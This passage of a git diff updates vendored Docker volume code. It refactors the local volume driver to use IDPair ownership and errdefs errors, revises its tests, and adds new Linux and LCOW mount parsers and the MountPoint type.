a/vendor/github.com/docker/docker/volume/drivers/proxy_test.go +++ b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go @@ -1,4 +1,4 @@ -package volumedrivers +package drivers // import "github.com/docker/docker/volume/drivers" import ( "fmt" diff --git a/vendor/github.com/docker/docker/volume/local/local.go b/vendor/github.com/docker/docker/volume/local/local.go index 62c45e69ea..d97347423a 100644 --- a/vendor/github.com/docker/docker/volume/local/local.go +++ b/vendor/github.com/docker/docker/volume/local/local.go @@ -1,7 +1,7 @@ // Package local provides the default implementation for volumes. It // is used to mount data volume containers and directories local to // the host server. -package local +package local // import "github.com/docker/docker/volume/local" import ( "encoding/json" @@ -13,13 +13,12 @@ import ( "strings" "sync" - "github.com/pkg/errors" - - "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/names" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" - "github.com/docker/docker/utils" "github.com/docker/docker/volume" + "github.com/pkg/errors" ) // VolumeDataPathName is the name of the directory where the volume data is stored. @@ -36,17 +35,9 @@ var ( // volumeNameRegex ensures the name assigned for the volume is valid. // This name is used to create the bind directory, so we need to avoid characters that // would make the path to escape the root directory. - volumeNameRegex = utils.RestrictedNamePattern + volumeNameRegex = names.RestrictedNamePattern ) -type validationError struct { - error -} - -func (validationError) IsValidationError() bool { - return true -} - type activeMount struct { count uint64 mounted bool @@ -55,10 +46,10 @@ type activeMount struct { // New instantiates a new Root instance with the provided scope. Scope // is the base path that the Root instance uses to store its // volumes. The base path is created here if it does not exist. -func New(scope string, rootUID, rootGID int) (*Root, error) { +func New(scope string, rootIDs idtools.IDPair) (*Root, error) { rootDirectory := filepath.Join(scope, volumesPathName) - if err := idtools.MkdirAllAs(rootDirectory, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(rootDirectory, 0700, rootIDs); err != nil { return nil, err } @@ -66,8 +57,7 @@ func New(scope string, rootUID, rootGID int) (*Root, error) { scope: scope, path: rootDirectory, volumes: make(map[string]*localVolume), - rootUID: rootUID, - rootGID: rootGID, + rootIDs: rootIDs, } dirs, err := ioutil.ReadDir(rootDirectory) @@ -75,11 +65,6 @@ func New(scope string, rootUID, rootGID int) (*Root, error) { return nil, err } - mountInfos, err := mount.GetMounts() - if err != nil { - logrus.Debugf("error looking up mounts for local volume cleanup: %v", err) - } - for _, d := range dirs { if !d.IsDir() { continue @@ -105,12 +90,7 @@ func New(scope string, rootUID, rootGID int) (*Root, error) { } // unmount anything that may still be mounted (for example, from an unclean shutdown) - for _, info := range mountInfos { - if info.Mountpoint == v.path { - mount.Unmount(v.path) - break - } - } + mount.Unmount(v.path) } } @@ -125,8 +105,7 @@ type Root struct { scope string path string volumes map[string]*localVolume - rootUID int - rootGID int + rootIDs idtools.IDPair } // List lists all the volumes @@ -167,11 +146,8 @@ func (r *Root) Create(name string, opts map[string]string) (volume.Volume, error } path := r.DataPath(name) - if err := idtools.MkdirAllAs(path, 0755, r.rootUID, r.rootGID); err != nil { - if os.IsExist(err) { - return nil, fmt.Errorf("volume already exists under %s", filepath.Dir(path)) - } - return nil, errors.Wrapf(err, "error while creating volume path '%s'", path) + if err := idtools.MkdirAllAndChown(path, 0755, r.rootIDs); err != nil { + return nil, errors.Wrapf(errdefs.System(err), "error while creating volume path '%s'", path) } var err error @@ -197,7 +173,7 @@ func (r *Root) Create(name string, opts map[string]string) (volume.Volume, error return nil, err } if err = ioutil.WriteFile(filepath.Join(filepath.Dir(path), "opts.json"), b, 600); err != nil { - return nil, errors.Wrap(err, "error while persisting volume options") + return nil, errdefs.System(errors.Wrap(err, "error while persisting volume options")) } } @@ -215,7 +191,15 @@ func (r *Root) Remove(v volume.Volume) error { lv, ok := v.(*localVolume) if !ok { - return fmt.Errorf("unknown volume type %T", v) + return errdefs.System(errors.Errorf("unknown volume type %T", v)) + } + + if lv.active.count > 0 { + return errdefs.System(errors.Errorf("volume has active mounts")) + } + + if err := lv.unmount(); err != nil { + return err } realPath, err := filepath.EvalSymlinks(lv.path) @@ -227,7 +211,7 @@ func (r *Root) Remove(v volume.Volume) error { } if !r.scopedPath(realPath) { - return fmt.Errorf("Unable to remove a directory of out the Docker root %s: %s", r.scope, realPath) + return errdefs.System(errors.Errorf("Unable to remove a directory outside of the local volume root %s: %s", r.scope, realPath)) } if err := removePath(realPath); err != nil { @@ -243,7 +227,7 @@ func removePath(path string) error { if os.IsNotExist(err) { return nil } - return errors.Wrapf(err, "error removing volume path '%s'", path) + return errdefs.System(errors.Wrapf(err, "error removing volume path '%s'", path)) } return nil } @@ -264,12 +248,20 @@ func (r *Root) Scope() string { return volume.LocalScope } +type validationError string + +func (e validationError) Error() string { + return string(e) +} + +func (e validationError) InvalidParameter() {} + func (r *Root) validateName(name string) error { if len(name) == 1 { - return validationError{fmt.Errorf("volume name is too short, names should be at least two alphanumeric characters")} + return validationError("volume name is too short, names should be at least two alphanumeric characters") } if !volumeNameRegex.MatchString(name) { - return validationError{fmt.Errorf("%q includes invalid characters for a local volume name, only %q are allowed. If you intented to pass a host directory, use absolute path", name, utils.RestrictedNameChars)} + return validationError(fmt.Sprintf("%q includes invalid characters for a local volume name, only %q are allowed. If you intended to pass a host directory, use absolute path", name, names.RestrictedNameChars)) } return nil } @@ -305,14 +297,20 @@ func (v *localVolume) Path() string { return v.path } +// CachedPath returns the data location +func (v *localVolume) CachedPath() string { + return v.path +} + // Mount implements the localVolume interface, returning the data location. +// If there are any provided mount options, the resources will be mounted at this point func (v *localVolume) Mount(id string) (string, error) { v.m.Lock() defer v.m.Unlock() if v.opts != nil { if !v.active.mounted { if err := v.mount(); err != nil { - return "", err + return "", errdefs.System(err) } v.active.mounted = true } @@ -321,19 +319,35 @@ func (v *localVolume) Mount(id string) (string, error) { return v.path, nil } -// Umount is for satisfying the localVolume interface and does not do anything in this driver. +// Unmount dereferences the id, and if it is the last reference will unmount any resources +// that were previously mounted. func (v *localVolume) Unmount(id string) error { v.m.Lock() defer v.m.Unlock() + + // Always decrement the count, even if the unmount fails + // Essentially docker doesn't care if this fails, it will send an error, but + // ultimately there's nothing that can be done. If we don't decrement the count + // this volume can never be removed until a daemon restart occurs. if v.opts != nil { v.active.count-- - if v.active.count == 0 { - if err := mount.Unmount(v.path); err != nil { - v.active.count++ - return errors.Wrapf(err, "error while unmounting volume path '%s'", v.path) + } + + if v.active.count > 0 { + return nil + } + + return v.unmount() +} + +func (v *localVolume) unmount() error { + if v.opts != nil { + if err := mount.Unmount(v.path); err != nil { + if mounted, mErr := mount.Mounted(v.path); mounted || mErr != nil { + return errdefs.System(errors.Wrapf(err, "error while unmounting volume path '%s'", v.path)) } - v.active.mounted = false } + v.active.mounted = false } return nil } @@ -341,7 +355,7 @@ func (v *localVolume) Unmount(id string) error { func validateOpts(opts map[string]string) error { for opt := range opts { if !validOpts[opt] { - return validationError{fmt.Errorf("invalid option key: %q", opt)} + return validationError(fmt.Sprintf("invalid option key: %q", opt)) } } return nil @@ -356,7 +370,7 @@ func getAddress(opts string) string { optsList := strings.Split(opts, ",") for i := 0; i < len(optsList); i++ { if strings.HasPrefix(optsList[i], "addr=") { - addr := (strings.SplitN(optsList[i], "=", 2)[1]) + addr := strings.SplitN(optsList[i], "=", 2)[1] return addr } } diff --git a/vendor/github.com/docker/docker/volume/local/local_test.go b/vendor/github.com/docker/docker/volume/local/local_test.go index f5a519b883..4cb47ba045 100644 --- a/vendor/github.com/docker/docker/volume/local/local_test.go +++ b/vendor/github.com/docker/docker/volume/local/local_test.go @@ -1,4 +1,4 @@ -package local +package local // import "github.com/docker/docker/volume/local" import ( "io/ioutil" @@ -9,7 +9,9 @@ import ( "strings" "testing" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" + "gotest.tools/skip" ) func TestGetAddress(t *testing.T) { @@ -29,18 +31,14 @@ func TestGetAddress(t *testing.T) { } func TestRemove(t *testing.T) { - // TODO Windows: Investigate why this test fails on Windows under CI - // but passes locally. - if runtime.GOOS == "windows" { - t.Skip("Test failing on Windows CI") - } + skip.If(t, runtime.GOOS == "windows", "FIXME: investigate why this test fails on CI") rootDir, err := ioutil.TempDir("", "local-volume-test") if err != nil { t.Fatal(err) } defer os.RemoveAll(rootDir) - r, err := New(rootDir, 0, 0) + r, err := New(rootDir, idtools.IDPair{UID: os.Geteuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -82,7 +80,7 @@ func TestInitializeWithVolumes(t *testing.T) { } defer os.RemoveAll(rootDir) - r, err := New(rootDir, 0, 0) + r, err := New(rootDir, idtools.IDPair{UID: os.Geteuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -92,7 +90,7 @@ func TestInitializeWithVolumes(t *testing.T) { t.Fatal(err) } - r, err = New(rootDir, 0, 0) + r, err = New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -114,7 +112,7 @@ func TestCreate(t *testing.T) { } defer os.RemoveAll(rootDir) - r, err := New(rootDir, 0, 0) + r, err := New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -151,7 +149,7 @@ func TestCreate(t *testing.T) { } } - r, err = New(rootDir, 0, 0) + r, err = New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -180,16 +178,15 @@ func TestValidateName(t *testing.T) { } func TestCreateWithOpts(t *testing.T) { - if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { - t.Skip() - } + skip.If(t, runtime.GOOS == "windows") + skip.If(t, os.Getuid() != 0, "requires mounts") rootDir, err := ioutil.TempDir("", "local-volume-test") if err != nil { t.Fatal(err) } defer os.RemoveAll(rootDir) - r, err := New(rootDir, 0, 0) + r, err := New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -214,33 +211,27 @@ func TestCreateWithOpts(t *testing.T) { } }() - mountInfos, err := mount.GetMounts() + mountInfos, err := mount.GetMounts(mount.SingleEntryFilter(dir)) if err != nil { t.Fatal(err) } - - var found bool - for _, info := range mountInfos { - if info.Mountpoint == dir { - found = true - if info.Fstype != "tmpfs" { - t.Fatalf("expected tmpfs mount, got %q", info.Fstype) - } - if info.Source != "tmpfs" { - t.Fatalf("expected tmpfs mount, got %q", info.Source) - } - if !strings.Contains(info.VfsOpts, "uid=1000") { - t.Fatalf("expected mount info to have uid=1000: %q", info.VfsOpts) - } - if !strings.Contains(info.VfsOpts, "size=1024k") { - t.Fatalf("expected mount info to have size=1024k: %q", info.VfsOpts) - } - break - } + if len(mountInfos) != 1 { + t.Fatalf("expected 1 mount, found %d: %+v", len(mountInfos), mountInfos) } - if !found { - t.Fatal("mount not found") + info := mountInfos[0] + t.Logf("%+v", info) + if info.Fstype != "tmpfs" { + t.Fatalf("expected tmpfs mount, got %q", info.Fstype) + } + if info.Source != "tmpfs" { + t.Fatalf("expected tmpfs mount, got %q", info.Source) + } + if !strings.Contains(info.VfsOpts, "uid=1000") { + t.Fatalf("expected mount info to have uid=1000: %q", info.VfsOpts) + } + if !strings.Contains(info.VfsOpts, "size=1024k") { + t.Fatalf("expected mount info to have size=1024k: %q", info.VfsOpts) } if v.active.count != 1 { @@ -270,7 +261,7 @@ func TestCreateWithOpts(t *testing.T) { t.Fatal("expected mount to still be active") } - r, err = New(rootDir, 0, 0) + r, err = New(rootDir, idtools.IDPair{UID: 0, GID: 0}) if err != nil { t.Fatal(err) } @@ -285,14 +276,14 @@ func TestCreateWithOpts(t *testing.T) { } } -func TestRealodNoOpts(t *testing.T) { +func TestRelaodNoOpts(t *testing.T) { rootDir, err := ioutil.TempDir("", "volume-test-reload-no-opts") if err != nil { t.Fatal(err) } defer os.RemoveAll(rootDir) - r, err := New(rootDir, 0, 0) + r, err := New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } @@ -320,7 +311,7 @@ func TestRealodNoOpts(t *testing.T) { t.Fatal(err) } - r, err = New(rootDir, 0, 0) + r, err = New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) if err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/volume/local/local_unix.go b/vendor/github.com/docker/docker/volume/local/local_unix.go index fb08862cef..b1c68b931b 100644 --- a/vendor/github.com/docker/docker/volume/local/local_unix.go +++ b/vendor/github.com/docker/docker/volume/local/local_unix.go @@ -1,15 +1,18 @@ -// +build linux freebsd solaris +// +build linux freebsd // Package local provides the default implementation for volumes. It // is used to mount data volume containers and directories local to // the host server. -package local +package local // import "github.com/docker/docker/volume/local" import ( "fmt" "net" + "os" "path/filepath" "strings" + "syscall" + "time" "github.com/pkg/errors" @@ -85,3 +88,12 @@ func (v *localVolume) mount() error { err := mount.Mount(v.opts.MountDevice, v.path, v.opts.MountType, mountOpts) return errors.Wrapf(err, "error while mounting volume with options: %s", v.opts) } + +func (v *localVolume) CreatedAt() (time.Time, error) { + fileInfo, err := os.Stat(v.path) + if err != nil { + return time.Time{}, err + } + sec, nsec := fileInfo.Sys().(*syscall.Stat_t).Ctim.Unix() + return time.Unix(sec, nsec), nil +} diff --git a/vendor/github.com/docker/docker/volume/local/local_windows.go b/vendor/github.com/docker/docker/volume/local/local_windows.go index 1bdb368a0f..d96fc0f594 100644 --- a/vendor/github.com/docker/docker/volume/local/local_windows.go +++ b/vendor/github.com/docker/docker/volume/local/local_windows.go @@ -1,12 +1,15 @@ // Package local provides the default implementation for volumes. It // is used to mount data volume containers and directories local to // the host server. -package local +package local // import "github.com/docker/docker/volume/local" import ( "fmt" + "os" "path/filepath" "strings" + "syscall" + "time" ) type optsConfig struct{} @@ -32,3 +35,12 @@ func setOpts(v *localVolume, opts map[string]string) error { func (v *localVolume) mount() error { return nil } + +func (v *localVolume) CreatedAt() (time.Time, error) { + fileInfo, err := os.Stat(v.path) + if err != nil { + return time.Time{}, err + } + ft := fileInfo.Sys().(*syscall.Win32FileAttributeData).CreationTime + return time.Unix(0, ft.Nanoseconds()), nil +} diff --git a/vendor/github.com/docker/docker/volume/mounts/lcow_parser.go b/vendor/github.com/docker/docker/volume/mounts/lcow_parser.go new file mode 100644 index 0000000000..bafb7b07f8 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/lcow_parser.go @@ -0,0 +1,34 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "errors" + "path" + + "github.com/docker/docker/api/types/mount" +) + +var lcowSpecificValidators mountValidator = func(m *mount.Mount) error { + if path.Clean(m.Target) == "/" { + return ErrVolumeTargetIsRoot + } + if m.Type == mount.TypeNamedPipe { + return errors.New("Linux containers on Windows do not support named pipe mounts") + } + return nil +} + +type lcowParser struct { + windowsParser +} + +func (p *lcowParser) ValidateMountConfig(mnt *mount.Mount) error { + return p.validateMountConfigReg(mnt, rxLCOWDestination, lcowSpecificValidators) +} + +func (p *lcowParser) ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) { + return p.parseMountRaw(raw, volumeDriver, rxLCOWDestination, false, lcowSpecificValidators) +} + +func (p *lcowParser) ParseMountSpec(cfg mount.Mount) (*MountPoint, error) { + return p.parseMountSpec(cfg, rxLCOWDestination, false, lcowSpecificValidators) +} diff --git a/vendor/github.com/docker/docker/volume/mounts/linux_parser.go b/vendor/github.com/docker/docker/volume/mounts/linux_parser.go new file mode 100644 index 0000000000..8e436aec0e --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/linux_parser.go @@ -0,0 +1,417 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "errors" + "fmt" + "path" + "path/filepath" + "strings" + + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" +) + +type linuxParser struct { +} + +func linuxSplitRawSpec(raw string) ([]string, error) { + if strings.Count(raw, ":") > 2 { + return nil, errInvalidSpec(raw) + } + + arr := strings.SplitN(raw, ":", 3) + if arr[0] == "" { + return nil, errInvalidSpec(raw) + } + return arr, nil +} + +func linuxValidateNotRoot(p string) error { + p = path.Clean(strings.Replace(p, `\`, `/`, -1)) + if p == "/" { + return ErrVolumeTargetIsRoot + } + return nil +} +func linuxValidateAbsolute(p string) error { + p = strings.Replace(p, `\`, `/`, -1) + if path.IsAbs(p) { + return nil + } + return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p) +} +func (p *linuxParser) ValidateMountConfig(mnt *mount.Mount) error { + // there was something looking like a bug in existing codebase: + // - validateMountConfig on linux was called with options skipping bind source existence when calling ParseMountRaw + // - but not when calling ParseMountSpec directly... nor when the unit test called it directly + return p.validateMountConfigImpl(mnt, true) +} +func (p *linuxParser) validateMountConfigImpl(mnt *mount.Mount, validateBindSourceExists bool) error { + if len(mnt.Target) == 0 { + return &errMountConfig{mnt, errMissingField("Target")} + } + + if err := linuxValidateNotRoot(mnt.Target); err != nil { + return &errMountConfig{mnt, err} + } + + if err := linuxValidateAbsolute(mnt.Target); err != nil { + return &errMountConfig{mnt, err} + } + + switch mnt.Type { + case mount.TypeBind: + if len(mnt.Source) == 0 { + return &errMountConfig{mnt, errMissingField("Source")} + } + // Don't error out just because the propagation mode is not supported on the platform + if opts := mnt.BindOptions; opts != nil { + if len(opts.Propagation) > 0 && len(linuxPropagationModes) > 0 { + if _, ok := linuxPropagationModes[opts.Propagation]; !ok { + return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)} + } + } + } + if mnt.VolumeOptions != nil { + return &errMountConfig{mnt, errExtraField("VolumeOptions")} + } + + if err := linuxValidateAbsolute(mnt.Source); err != nil { + return &errMountConfig{mnt, err} + } + + if validateBindSourceExists { + exists, _, _ := currentFileInfoProvider.fileInfo(mnt.Source) + if !exists { + return &errMountConfig{mnt, errBindSourceDoesNotExist(mnt.Source)} + } + } + + case mount.TypeVolume: + if mnt.BindOptions != nil { + return &errMountConfig{mnt, errExtraField("BindOptions")} + } + + if len(mnt.Source) == 0 && mnt.ReadOnly { + return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")} + } + case mount.TypeTmpfs: + if len(mnt.Source) != 0 { + return &errMountConfig{mnt, errExtraField("Source")} + } + if _, err := p.ConvertTmpfsOptions(mnt.TmpfsOptions, mnt.ReadOnly); err != nil { + return &errMountConfig{mnt, err} + } + default: + return &errMountConfig{mnt, errors.New("mount type unknown")} + } + return nil +} + +// read-write modes +var rwModes = map[string]bool{ + "rw": true, + "ro": true, +} + +// label modes +var linuxLabelModes = map[string]bool{ + "Z": true, + "z": true, +} + +// consistency modes +var linuxConsistencyModes = map[mount.Consistency]bool{ + mount.ConsistencyFull: true, + mount.ConsistencyCached: true, + mount.ConsistencyDelegated: true, +} +var linuxPropagationModes = map[mount.Propagation]bool{ + mount.PropagationPrivate: true, + mount.PropagationRPrivate: true, + mount.PropagationSlave: true, + mount.PropagationRSlave: true, + mount.PropagationShared: true, + mount.PropagationRShared: true, +} + +const linuxDefaultPropagationMode = mount.PropagationRPrivate + +func linuxGetPropagation(mode string) mount.Propagation { + for _, o := range strings.Split(mode, ",") { + prop := mount.Propagation(o) + if linuxPropagationModes[prop] { + return prop + } + } + return linuxDefaultPropagationMode +} + +func linuxHasPropagation(mode string) bool { + for _, o := range strings.Split(mode, ",") { + if linuxPropagationModes[mount.Propagation(o)] { + return true + } + } + return false +} + +func linuxValidMountMode(mode string) bool { + if mode == "" { + return true + } + + rwModeCount := 0 + labelModeCount := 0 + propagationModeCount := 0 + copyModeCount := 0 + consistencyModeCount := 0 + + for _, o := range strings.Split(mode, ",") { + switch { + case rwModes[o]: + rwModeCount++ + case linuxLabelModes[o]: + labelModeCount++ + case linuxPropagationModes[mount.Propagation(o)]: + propagationModeCount++ + case copyModeExists(o): + copyModeCount++ + case linuxConsistencyModes[mount.Consistency(o)]: + consistencyModeCount++ + default: + return false + } + } + + // Only one string for each mode is allowed. + if rwModeCount > 1 || labelModeCount > 1 || propagationModeCount > 1 || copyModeCount > 1 || consistencyModeCount > 1 { + return false + } + return true +} + +func (p *linuxParser) ReadWrite(mode string) bool { + if !linuxValidMountMode(mode) { + return false + } + + for _, o := range strings.Split(mode, ",") { + if o == "ro" { + return false + } + } + return true +} + +func (p *linuxParser) ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) { + arr, err := linuxSplitRawSpec(raw) + if err != nil { + return nil, err + } + + var spec mount.Mount + var mode string + switch len(arr) { + case 1: + // Just a destination path in the container + spec.Target = arr[0] + case 2: + if linuxValidMountMode(arr[1]) { + // Destination + Mode is not a valid volume - volumes + // cannot include a mode. e.g. /foo:rw + return nil, errInvalidSpec(raw) + } + // Host Source Path or Name + Destination + spec.Source = arr[0] + spec.Target = arr[1] + case 3: + // HostSourcePath+DestinationPath+Mode + spec.Source = arr[0] + spec.Target = arr[1] + mode = arr[2] + default: + return nil, errInvalidSpec(raw) + } + + if !linuxValidMountMode(mode) { + return nil, errInvalidMode(mode) + } + + if path.IsAbs(spec.Source) { + spec.Type = mount.TypeBind + } else { + spec.Type = mount.TypeVolume + } + + spec.ReadOnly = !p.ReadWrite(mode) + + // cannot assume that if a volume driver is passed in that we should set it + if volumeDriver != "" && spec.Type == mount.TypeVolume { + spec.VolumeOptions = &mount.VolumeOptions{ + DriverConfig: &mount.Driver{Name: volumeDriver}, + } + } + + if copyData, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet { + if spec.VolumeOptions == nil { + spec.VolumeOptions = &mount.VolumeOptions{} + } + spec.VolumeOptions.NoCopy = !copyData + } + if linuxHasPropagation(mode) { + spec.BindOptions = &mount.BindOptions{ + Propagation: linuxGetPropagation(mode), + } + } + + mp, err := p.parseMountSpec(spec, false) + if mp != nil { + mp.Mode = mode + } + if err != nil { + err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err) + } + return mp, err +} +func (p *linuxParser) ParseMountSpec(cfg mount.Mount) (*MountPoint, error) { + return p.parseMountSpec(cfg, true) +} +func (p *linuxParser) parseMountSpec(cfg mount.Mount, validateBindSourceExists bool) (*MountPoint, error) { + if err := p.validateMountConfigImpl(&cfg, validateBindSourceExists); err != nil { + return nil, err + } + mp := &MountPoint{ + RW: !cfg.ReadOnly, + Destination: path.Clean(filepath.ToSlash(cfg.Target)), + Type: cfg.Type, + Spec: cfg, + } + + switch cfg.Type { + case mount.TypeVolume: + if cfg.Source == "" { + mp.Name = stringid.GenerateNonCryptoID() + } else { + mp.Name = cfg.Source + } + mp.CopyData = p.DefaultCopyMode() + + if cfg.VolumeOptions != nil { + if cfg.VolumeOptions.DriverConfig != nil { + mp.Driver = cfg.VolumeOptions.DriverConfig.Name + } + if cfg.VolumeOptions.NoCopy { + mp.CopyData = false + } + } + case mount.TypeBind: + mp.Source = path.Clean(filepath.ToSlash(cfg.Source)) + if cfg.BindOptions != nil && len(cfg.BindOptions.Propagation) > 0 { + mp.Propagation = cfg.BindOptions.Propagation + } else { + // If user did not specify a propagation mode, get + // default propagation mode. + mp.Propagation = linuxDefaultPropagationMode + } + case mount.TypeTmpfs: + // NOP + } + return mp, nil +} + +func (p *linuxParser) ParseVolumesFrom(spec string) (string, string, error) { + if len(spec) == 0 { + return "", "", fmt.Errorf("volumes-from specification cannot be an empty string") + } + + specParts := strings.SplitN(spec, ":", 2) + id := specParts[0] + mode := "rw" + + if len(specParts) == 2 { + mode = specParts[1] + if !linuxValidMountMode(mode) { + return "", "", errInvalidMode(mode) + } + // For now don't allow propagation properties while importing + // volumes from data container. These volumes will inherit + // the same propagation property as of the original volume + // in data container. This probably can be relaxed in future. + if linuxHasPropagation(mode) { + return "", "", errInvalidMode(mode) + } + // Do not allow copy modes on volumes-from + if _, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet { + return "", "", errInvalidMode(mode) + } + } + return id, mode, nil +} + +func (p *linuxParser) DefaultPropagationMode() mount.Propagation { + return linuxDefaultPropagationMode +} + +func (p *linuxParser) ConvertTmpfsOptions(opt *mount.TmpfsOptions, readOnly bool) (string, error) { + var rawOpts []string + if readOnly { + rawOpts = append(rawOpts, "ro") + } + + if opt != nil && opt.Mode != 0 { + rawOpts = append(rawOpts, fmt.Sprintf("mode=%o", opt.Mode)) + } + + if opt != nil && opt.SizeBytes != 0 { + // calculate suffix here, making this linux specific, but that is + // okay, since API is that way anyways. + + // we do this by finding the suffix that divides evenly into the + // value, returning the value itself, with no suffix, if it fails. + // + // For the most part, we don't enforce any semantic to this values. + // The operating system will usually align this and enforce minimum + // and maximums. + var ( + size = opt.SizeBytes + suffix string + ) + for _, r := range []struct { + suffix string + divisor int64 + }{ + {"g", 1 << 30}, + {"m", 1 << 20}, + {"k", 1 << 10}, + } { + if size%r.divisor == 0 { + size = size / r.divisor + suffix = r.suffix + break + } + } + + rawOpts = append(rawOpts, fmt.Sprintf("size=%d%s", size, suffix)) + } + return strings.Join(rawOpts, ","), nil +} + +func (p *linuxParser) DefaultCopyMode() bool { + return true +} +func (p *linuxParser) ValidateVolumeName(name string) error { + return nil +} + +func (p *linuxParser) IsBackwardCompatible(m *MountPoint) bool { + return len(m.Source) > 0 || m.Driver == volume.DefaultDriverName +} + +func (p *linuxParser) ValidateTmpfsMountDestination(dest string) error { + if err := linuxValidateNotRoot(dest); err != nil { + return err + } + return linuxValidateAbsolute(dest) +} diff --git a/vendor/github.com/docker/docker/volume/mounts/mounts.go b/vendor/github.com/docker/docker/volume/mounts/mounts.go new file mode 100644 index 0000000000..8f255a5482 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/mounts.go @@ -0,0 +1,170 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "fmt" + "os" + "path/filepath" + "syscall" + + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" +) + +// MountPoint is the intersection point between a volume and a container. It +// specifies which volume is to be used and where inside a container it should +// be mounted. +// +// Note that this type is embedded in `container.Container` object and persisted to disk. +// Changes to this struct need to by synced with on disk state. +type MountPoint struct { + // Source is the source path of the mount. + // E.g. `mount --bind /foo /bar`, `/foo` is the `Source`. + Source string + // Destination is the path relative to the container root (`/`) to the mount point + // It is where the `Source` is mounted to + Destination string + // RW is set to true when the mountpoint should be mounted as read-write + RW bool + // Name is the name reference to the underlying data defined by `Source` + // e.g., the volume name + Name string + // Driver is the volume driver used to create the volume (if it is a volume) + Driver string + // Type of mount to use, see `Type` definitions in github.com/docker/docker/api/types/mount + Type mounttypes.Type `json:",omitempty"` + // Volume is the volume providing data to this mountpoint. + // This is nil unless `Type` is set to `TypeVolume` + Volume volume.Volume `json:"-"` + + // Mode is the comma separated list of options supplied by the user when creating + // the bind/volume mount. + // Note Mode is not used on Windows + Mode string `json:"Relabel,omitempty"` // Originally field was `Relabel`" + + // Propagation describes how the mounts are propagated from the host into the + // mount point, and vice-versa. + // See https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt + // Note Propagation is not used on Windows + Propagation mounttypes.Propagation `json:",omitempty"` // Mount propagation string + + // Specifies if data should be copied from the container before the first mount + // Use a pointer here so we can tell if the user set this value explicitly + // This allows us to error out when the user explicitly enabled copy but we can't copy due to the volume being populated + CopyData bool `json:"-"` + // ID is the opaque ID used to pass to the volume driver. + // This should be set by calls to `Mount` and unset by calls to `Unmount` + ID string `json:",omitempty"` + + // Sepc is a copy of the API request that created this mount. + Spec mounttypes.Mount + + // Track usage of this mountpoint + // Specifically needed for containers which are running and calls to `docker cp` + // because both these actions require mounting the volumes. + active int +} + +// Cleanup frees resources used by the mountpoint +func (m *MountPoint) Cleanup() error { + if m.Volume == nil || m.ID == "" { + return nil + } + + if err := m.Volume.Unmount(m.ID); err != nil { + return errors.Wrapf(err, "error unmounting volume %s", m.Volume.Name()) + } + + m.active-- + if m.active == 0 { + m.ID = "" + } + return nil +} + +// Setup sets up a mount point by either mounting the volume if it is +// configured, or creating the source directory if supplied. +// The, optional, checkFun parameter allows doing additional checking +// before creating the source directory on the host. +func (m *MountPoint) Setup(mountLabel string, rootIDs idtools.IDPair, checkFun func(m *MountPoint) error) (path string, err error) { + defer func() { + if err != nil || !label.RelabelNeeded(m.Mode) { + return + } + + var sourcePath string + sourcePath, err = filepath.EvalSymlinks(m.Source) + if err != nil { + path = "" + err = errors.Wrapf(err, "error evaluating symlinks from mount source %q", m.Source) + return + } + err = label.Relabel(sourcePath, mountLabel, label.IsShared(m.Mode)) + if err == syscall.ENOTSUP { + err = nil + } + if err != nil { + path = "" + err = errors.Wrapf(err, "error setting label on mount source '%s'", sourcePath) + } + }() + + if m.Volume != nil { + id := m.ID + if id == "" { + id = stringid.GenerateNonCryptoID() + } + path, err := m.Volume.Mount(id) + if err != nil { + return "", errors.Wrapf(err, "error while mounting volume '%s'", m.Source) + } + + m.ID = id + m.active++ + return path, nil + } + + if len(m.Source) == 0 { + return "", fmt.Errorf("Unable to setup mount point, neither source nor volume defined") + } + + if m.Type == mounttypes.TypeBind { + // Before creating the source directory on the host, invoke checkFun if it's not nil. One of + // the use case is to forbid creating the daemon socket as a directory if the daemon is in + // the process of shutting down. + if checkFun != nil { + if err := checkFun(m); err != nil { + return "", err + } + } + // idtools.MkdirAllNewAs() produces an error if m.Source exists and is a file (not a directory) + // also, makes sure that if the directory is created, the correct remapped rootUID/rootGID will own it + if err := idtools.MkdirAllAndChownNew(m.Source, 0755, rootIDs); err != nil { + if perr, ok := err.(*os.PathError); ok { + if perr.Err != syscall.ENOTDIR { + return "", errors.Wrapf(err, 